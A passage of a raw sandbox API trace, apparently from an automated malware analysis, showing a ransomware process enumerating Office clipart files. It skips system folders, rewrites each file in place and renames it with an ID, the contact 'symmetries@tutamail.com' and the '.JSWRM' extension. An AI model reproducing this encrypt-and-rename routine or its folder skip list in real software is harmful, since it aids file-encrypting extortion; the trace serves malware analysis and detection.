Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.967] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45476) returned 1 [0092.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb1a0) returned 0x24d210 [0092.967] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb1a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb1a0, lpOverlapped=0x0) returned 1 [0092.974] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.974] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb1a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb1a0, lpOverlapped=0x0) returned 1 [0092.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.975] CloseHandle (hObject=0x314) returned 1 [0092.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0092.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0092.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0092.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0092.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.977] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9e2c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00737_.WMF", cAlternateFileName="")) returned 1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2=".") returned 1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="..") returned 1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="...") returned 1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="windows") returned -1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="recovery") returned -1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="perflogs") returned -1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="documents and settings") returned 1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="system volume information") returned -1 [0092.977] lstrcmpiW (lpString1="PE00737_.WMF", lpString2="msocache") returned 1 [0092.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00737_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00737_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00737_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00737_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00737_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00737_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.978] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40492) returned 1 [0092.978] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9e20) returned 0x24d210 [0092.978] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9e20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9e20, lpOverlapped=0x0) returned 1 [0092.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.983] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9e20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9e20, lpOverlapped=0x0) returned 1 [0092.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.984] CloseHandle (hObject=0x314) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0092.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0092.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0092.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0092.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.986] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ca0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00833_.WMF", cAlternateFileName="")) returned 1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2=".") returned 1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="..") returned 1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="...") returned 1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="windows") returned -1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="recovery") returned -1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="perflogs") returned -1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="documents and settings") returned 1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="system volume information") returned -1 [0092.986] lstrcmpiW (lpString1="PE00833_.WMF", lpString2="msocache") returned 1 [0092.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00833_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00833_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00833_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0092.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00833_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00833_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00833_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.987] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7328) returned 1 [0092.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ca0) returned 0x205850 [0092.987] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ca0, lpOverlapped=0x0) returned 1 [0093.021] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.021] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ca0, lpOverlapped=0x0) returned 1 [0093.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.021] CloseHandle (hObject=0x314) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0093.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0093.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0093.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.022] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.023] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1908, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00898_.WMF", cAlternateFileName="")) returned 1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2=".") returned 1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="..") returned 1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="...") returned 1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="windows") returned -1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="recovery") returned -1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="perflogs") returned -1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="documents and settings") returned 1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="system volume information") returned -1 [0093.023] lstrcmpiW (lpString1="PE00898_.WMF", lpString2="msocache") returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0093.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00898_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00898_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00898_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0093.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00898_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00898_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00898_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0093.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.024] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6408) returned 1 [0093.024] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1900) returned 0x205850 [0093.024] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1900, lpOverlapped=0x0) returned 1 [0093.026] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.026] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1900, lpOverlapped=0x0) returned 1 [0093.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.026] CloseHandle (hObject=0x314) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 